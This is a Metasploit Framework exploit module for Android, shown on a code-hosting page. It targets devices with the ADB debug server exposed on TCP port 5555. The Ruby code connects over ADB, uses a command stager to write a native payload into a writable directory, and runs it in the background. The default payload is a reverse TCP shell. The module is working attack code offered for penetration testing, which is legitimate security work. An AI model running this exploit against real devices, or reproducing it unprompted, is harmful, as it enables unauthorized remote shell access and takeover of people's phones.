Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/android/adb/adb_server_exec.rb
38483 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::CmdStager

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Android ADB Debug Server Remote Payload Execution',

17
        'Description' => %q{

18
          Writes and spawns a native payload on an Android device that is listening

19
          for adb debug messages.

20
        },

21
        'Author' => ['joev'],

22
        'License' => MSF_LICENSE,

23
        'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/shell_reverse_tcp' },

24
        'Platform' => 'linux',

25
        'Targets' => [

26
          ['armle', { 'Arch' => ARCH_ARMLE }],

27
          ['x86', { 'Arch' => ARCH_X86 }],

28
          ['x64', { 'Arch' => ARCH_X64 }],

29
          ['mipsle', { 'Arch' => ARCH_MIPSLE }]

30
        ],

31
        'DefaultTarget' => 0,

32
        'DisclosureDate' => '2016-01-01',

33
        'Notes' => {

34
          'SideEffects' => [ ARTIFACTS_ON_DISK ],

35
          'Reliability' => [ REPEATABLE_SESSION ],

36
          'Stability' => [ CRASH_SAFE ]

37
        }

38
      )

39
    )

40


41
    register_options([

42
      Opt::RPORT(5555),

43
      OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/'])

44
    ])

45
  end

46


47
  def check

48
    setup_adb_connection do

49
      device_info = @adb_client.connect.data

50
      print_good("Detected device:\n#{device_info}")

51
      return CheckCode::Vulnerable

52
    end

53


54
    CheckCode::Unknown

55
  end

56


57
  def execute_command(cmd, _opts)

58
    response = @adb_client.exec_cmd(cmd)

59
    print_good("Command executed, response:\n #{response}")

60
  end

61


62
  def exploit

63
    setup_adb_connection do

64
      device_data = @adb_client.connect

65
      print_good("Connected to device:\n#{device_data.data}")

66
      execute_cmdstager({

67
        flavor: :echo,

68
        enc_format: :octal,

69
        prefix: '\\\\0',

70
        temp: datastore['WritableDir'],

71
        linemax: Rex::Proto::ADB::Message::Connect::DEFAULT_MAXDATA - 8,

72
        background: true,

73
        nodelete: true

74
      })

75
    end

76
  end

77


78
  def setup_adb_connection(&blk)

79
    print_status('Connecting to device...')

80
    connect

81
    @adb_client = Rex::Proto::ADB::Client.new(sock)

82
    blk.call

83
  ensure

84
    disconnect

85
  end

86
end

87


88